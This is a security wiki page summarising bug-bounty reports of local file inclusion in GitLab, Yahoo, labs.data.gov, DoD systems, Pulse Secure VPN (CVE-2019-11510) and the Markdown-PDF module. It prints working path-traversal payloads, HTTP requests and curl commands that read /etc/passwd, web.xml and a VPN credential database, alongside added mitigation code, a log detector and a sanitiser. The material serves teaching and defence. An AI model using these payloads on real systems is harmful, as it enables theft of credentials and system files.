# Local File Inclusion Writeups

## GitLab

{% embed url="https://hackerone.com/reports/827052" %}

The researcher discovered an LFI in GitLab when transferring an issue to another project. Create an issue in project A with the following payload in the description:

```
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
```

Then transfer that issue from project A to project B; the transfer copies the /etc/passwd file into project B.

Researcher PoC:

{% hint style="danger" %}
PoC removed. Todo add here
{% endhint %}

The issue lies in the UploadsRewriter controller, which copies referenced uploads when an issue is moved. It does not validate the file name or path taken from the markdown, so path traversal lets arbitrary files be copied into the target project when an issue is moved.

```ruby
# UploadsRewriter (vulnerable version): :secret and :file are captured straight from
# the issue markdown and handed to the uploader without any path validation.
@text.gsub(@pattern) do |markdown|
  file = find_file(@source_project, $~[:secret], $~[:file])
  break markdown unless file.try(:exists?)

  klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
  moved = klass.copy_to(file, target_parent)
...
def find_file(project, secret, file)
  uploader = FileUploader.new(project, secret: secret)
  uploader.retrieve_from_store!(file)   # file may contain ../ segments
  uploader
end
```

## Yahoo - URL sub parameter

{% embed url="https://hackerone.com/reports/7779" %}

Requesting a download for any file on <https://brandtoolkit.yahoo.com/> returns a download popup. The popup's URL is `marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=`, and the `dlurl` parameter contains the URL-encoded string `8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U`. Once URL decoded, three sub-parameters are visible: `z8A`, `Ujd` and `hj`.

`8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U`

The parameter vulnerable to LFI is `hj`. It is protected with ECB-mode encryption using a 32-character block size. The researcher wrote a PoC to decrypt and encrypt strings; for convenience, the report provides the payload `/../../../../../../../../etc/passwd` and its encrypted form `/../../../../../../../../79d/zGcIwd`.

Using the encrypted payload in the full URL retrieves the /etc/passwd file. Full URL with payload:

```
https://marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.%2AQ%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F79d%2FzGcIwd
```

## TTS (labs.data.gov)

{% embed url="https://hackerone.com/reports/895972" %}

The researcher discovered a limited LFI on the endpoint <https://labs.data.gov/dashboard/Docs/index>: appending a URL-encoded dot-dot-slash followed by `README` extracts the Readme.md file.

Full URL with payload: `https://labs.data.gov/dashboard/Docs/index/..%2fREADME`

![Viewing the Readme.md file using LFI in the URL ](/files/-MPu50GnxGmXLGtYC2OD)

The LFI is limited to markdown files. In the code below, which implements this functionality, the `index` function of the `Docs` class takes the `page` parameter from the URL (the value the researcher replaced with the payload). The document path is then formed on line 7 (`$docs_path = $docs_path . $page . '.md';`) by concatenating the `docs_path` variable with the user-supplied `page` variable and appending `.md`. That appended `.md` suffix prevents any file other than markdown from being retrieved, but it does nothing to stop the traversal itself.

```php
public function index($page = 'main')
{
    $data = array();

    $docs_path = ($this->config->item('docs_path')) ? $this->config->item('docs_path') : 'https://raw.githubusercontent.com/GSA/project-open-data-dashboard/master/documentation/';
    // $page comes straight from the URL; only the '.md' suffix is appended, nothing is validated
    $docs_path = $docs_path . $page . '.md';
    $docs = @file_get_contents($docs_path);
```
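Both the GitLab and the labs.data.gov cases above (and the Yahoo `hj` parameter once it has been decrypted) come down to the same missing step: a user-supplied name is joined onto a base directory without checking where the result lands. The following is an added example, not code from GitLab or the dashboard project, showing the two usual mitigations: a containment check that canonicalises the joined path and requires it to stay under the intended root, and a strict allow-list for a parameter that should only ever be a bare page name. The root directories, the `PAGE_NAME` pattern and the function names are assumptions made for this example.

```python
"""Containment and allow-list checks for user-supplied file names (added example)."""
import os
import re
from urllib.parse import unquote

# Roots the two handlers are meant to serve from; hypothetical values for this example.
UPLOADS_ROOT = "/var/opt/gitlab/uploads"
DOCS_ROOT = "/srv/dashboard/documentation"

# Hypothetical allow-list for the dashboard's `page` parameter: a bare page name,
# no separators and no leading dot, so "../README" can never pass.
PAGE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*")


def resolve_inside(root, user_path):
    """Return the canonical path of user_path under root, or None if it escapes root.

    The check is lexical (normpath), so it needs no filesystem access; on a real
    deployment with symlinks, apply os.path.realpath to both sides as well.
    """
    root = os.path.normpath(root)
    # Drop a leading separator so an absolute user path cannot replace the root.
    candidate = os.path.normpath(os.path.join(root, user_path.lstrip("/")))
    # root + os.sep guards against sibling directories such as ".../uploads_old".
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def upload_path(secret, file_name):
    """Counterpart of find_file(project, secret, file): both values come from the
    issue markdown, so the joined path must still sit under the uploads root."""
    return resolve_inside(UPLOADS_ROOT, os.path.join(secret, file_name))


def docs_page_path(page):
    """Counterpart of `$docs_path . $page . '.md'` with an allow-list in front of it."""
    if not PAGE_NAME.fullmatch(page):
        return None
    return os.path.join(DOCS_ROOT, page + ".md")


if __name__ == "__main__":
    # Inputs taken from the writeups above; the secret is the one from the GitLab payload.
    secret = "11111111111111111111111111111111"
    print(upload_path(secret, "../../../../../../../../../../../../../../etc/passwd"))  # None
    print(upload_path(secret, "screenshot.png"))
    print(docs_page_path("main"))
    print(docs_page_path(unquote("..%2fREADME")))  # None
```

`resolve_inside` is the check to reach for when the user legitimately names a file under a directory; the allow-list in `docs_page_path` is simpler and stronger when the parameter only selects one of a few known pages.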

## DoD LFI

{% embed url="https://hackerone.com/reports/497771" %}

The LFI uses directory traversal (path traversal) with dot-dot-slash sequences that are double URL-encoded (`..%252f`) in the URL to retrieve files from the target system. Retrieving c:/windows/System32/drivers/etc/hosts as a PoC:

```http
GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1
Host: ██████████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```

The URL with the payload can also simply be pasted into a browser:

```
https://███████/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts
```

Attempting to retrieve Users/Administrator/NTUser.dat to determine whether the application runs under an administrator account:

```http
GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fUsers/Administrator/NTUser.dat HTTP/1.1
Host: ████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```

## DoD Pulse Secure LFI (CVE-2019-11510)

{% embed url="https://hackerone.com/reports/671749" %}

The researcher discovered a Pulse Secure SSL VPN server that was missing the patch for CVE-2019-11510. This vulnerability allows an attacker to retrieve backend files such as /etc/passwd. Another file targeted by attackers is the database file **/runtime/mtmp/lmdb/dataa/data.mdb**, which contains usernames and passwords; those credentials could be used to authenticate to the SSL VPN and conduct post-breach activity.

```bash
# $URL is the base URL of the VPN host; --path-as-is stops curl from collapsing the ../ segments itself

# Retrieve the /etc/passwd file
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"

# Retrieve the /runtime/mtmp/lmdb/dataa/data.mdb file
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
```
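The three URL-based cases above reach the file system in slightly different shapes: single-encoded `..%2f` (labs.data.gov), double-encoded `..%252f` (the DoD gwtmain endpoint) and raw `../` that survives because the client sends the path as-is (Pulse Secure). A detection rule that only decodes once, or only looks for the literal `../`, misses at least one of them. The following added example (not from any of the reports, and not any vendor's detection logic) decodes a request path repeatedly until it stops changing, then flags traversal segments, double encoding and references to the sensitive files named in these writeups, run over a few constructed access-log lines. The log format, client addresses and the `SENSITIVE_PATHS` list are assumptions for the example.

```python
"""Flag path-traversal attempts in access-log request paths, including double URL encoding (added example)."""
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # ..%252f needs two rounds; the bound keeps crafted input from looping
# '..' as its own path segment, with either slash, after full decoding.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Lower-cased markers for the files the writeups above show being read (assumed list).
SENSITIVE_PATHS = ("/etc/passwd", "web-inf/", "data.mdb", "ntuser.dat", "drivers/etc/hosts")
# Request line inside a combined/common log format entry (assumed log format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def fully_decode(value):
    """Percent-decode until the string stops changing, at most MAX_DECODE_ROUNDS times."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_path(raw_path):
    """Return the sorted list of findings for one request path (empty if benign)."""
    decoded = fully_decode(raw_path)
    findings = []
    if TRAVERSAL.search(decoded):
        findings.append("traversal")
    if unquote(raw_path) != decoded:       # a second decoding round changed it
        findings.append("double-encoded")
    lowered = decoded.lower()
    if any(marker in lowered for marker in SENSITIVE_PATHS):
        findings.append("sensitive-file")
    return sorted(findings)


def scan_access_log(lines):
    """Return {line_number: findings} for every request line that raises a finding."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        findings = classify_path(match.group(1))
        if findings:
            hits[number] = findings
    return hits


# Constructed log lines; the request paths mirror the payloads in the writeups above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2020:10:00:01 +0000] "GET /dashboard/Docs/index/main HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2020:10:00:02 +0000] "GET /dashboard/Docs/index/..%2fREADME HTTP/1.1" 200 2201',
    '203.0.113.9 - - [10/Oct/2020:10:00:03 +0000] "GET /gwtmain//..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1" 200 824',
    '203.0.113.11 - - [10/Oct/2020:10:00:04 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1380',
    '203.0.113.13 - - [10/Oct/2020:10:00:05 +0000] "GET /static/app.v1..2.js HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, findings in scan_access_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(findings)}")
```

The last sample line is there to show that `..` inside a file name (`app.v1..2.js`) is not a traversal segment and must not trip the rule; anchoring the pattern on path separators is what keeps the false-positive rate down.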

## DoD

{% embed url="https://hackerone.com/reports/1007799" %}

The researcher discovered an LFI on a DoD application's registration page. The HTTP form body parameter `registerUserInfoCommand.nextPageName` is vulnerable: submitting the payload `..%2f..%2f..%2fWEB-INF%2fweb.xml` returns the web.xml file to the user.

Full HTTP body parameters with the payload in registerUserInfoCommand.nextPageName:

```
registerUserInfoCommand.organization=Chantest+Corporation&registerUserInfoCommand.organizationId=49800&registerUserInfoCommand.currPageName=SearchUserOrgInfo.jsp&registerUserInfoCommand.nextPageName=..%2f..%2f..%2fWEB-INF%2fweb.xml&registerUserInfoCommand.prevPageName=jsp%2FRegistration%2FRegisterAccountInfo.jsp&registerUserInfoCommand.submitButton=Choose+This+Organization+and+Continue+%3E
```

The researcher retrieved the following files:

```
/WEB-INF/spring/mvc-config.xml
/WEB-INF/spring/rest-config.xml
/WEB-INF/classes/compliance/reports/adminRpt.pre.sql
/WEB-INF/classes/compliance/reports/adminRpt.full.sql
/WEB-INF/classes/compliance/reports/complianceStatusRptSql.sql
/WEB-INF/classes/████.properties
```

The last file contained database credentials:

```properties
Test.DB.URL=jdbc:oracle:thin:@localhost:1521:XE
Test.DB.username=██████████
Test.DB.password=██████
```

## Markdown-PDF: 3rd Party Node Module

{% embed url="https://hackerone.com/reports/360727" %}

The researcher discovered an LFI in the third-party Node.js module Markdown-PDF. The module converts markdown to PDF, but it first converts the markdown into an HTML5 boilerplate page (index.html), which PhantomJS then renders and saves as a PDF. Because the HTML is rendered server-side before conversion, a malicious markdown file can read local files. Uploading the markdown file below (test.md) uses document.write to write the contents of /etc/passwd into the document, which is returned to the end user after PDF conversion:

```markdown
# this is h1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
```
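The root cause here is that markdown may carry raw HTML, and the HTML is executed by a headless browser that can read local files. A defence that belongs in the converter is an allow-list sanitiser applied to the generated HTML before it reaches the renderer (in addition to denying the renderer local file access). The following added example is not Markdown-PDF's code; it is a small allow-list sanitiser built on Python's `html.parser` that keeps only a fixed set of formatting tags, drops `script`, `iframe` and similar elements together with their content, strips every attribute except a safe `href`, and reports what it removed so the rejection can be logged. The tag and attribute lists are assumptions for the example, and the input is the HTML the `test.md` payload above would produce.

```python
"""Allow-list HTML sanitiser for converter output before headless rendering (added example)."""
from html import escape
from html.parser import HTMLParser

# Assumed allow-list: formatting elements a markdown converter legitimately emits.
ALLOWED_TAGS = {"h1", "h2", "h3", "p", "em", "strong", "code", "pre",
                "ul", "ol", "li", "a", "blockquote", "br", "hr"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")   # rejects javascript: and file: links
VOID_TAGS = {"br", "hr"}
# Elements whose whole content is discarded, not just the tag itself.
CONTENT_DROPPED = {"script", "style", "iframe", "object", "embed"}


class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside an element from CONTENT_DROPPED
        self.dropped = []     # names of removed elements, for logging

    def handle_starttag(self, tag, attrs):
        if tag in CONTENT_DROPPED:
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue          # every on* handler and unknown attribute is dropped here
            value = value.strip()
            if name == "href" and not value.lower().startswith(SAFE_URL_SCHEMES):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in CONTENT_DROPPED:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth:
            return                # script/style bodies never reach the output
        self.out.append(escape(data, quote=False))


def sanitize_html(fragment):
    """Return (sanitised_html, dropped_tag_names) for an untrusted HTML fragment."""
    parser = AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed input: what the converter produces from the test.md payload above.
UNTRUSTED_HTML = (
    "<h1>this is h1</h1>\n"
    '<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};'
    'x.open("GET","file:///etc/passwd");x.send();</script>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_html(UNTRUSTED_HTML)
    print(clean)        # <h1>this is h1</h1>
    print(dropped)      # ['script']
```

Because `html.parser` switches into raw-text mode for `script` and `style`, their bodies arrive through `handle_data` and are discarded while `skip_depth` is set; for other dropped elements, such as `iframe`, the nested content is skipped the same way until the matching end tag.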
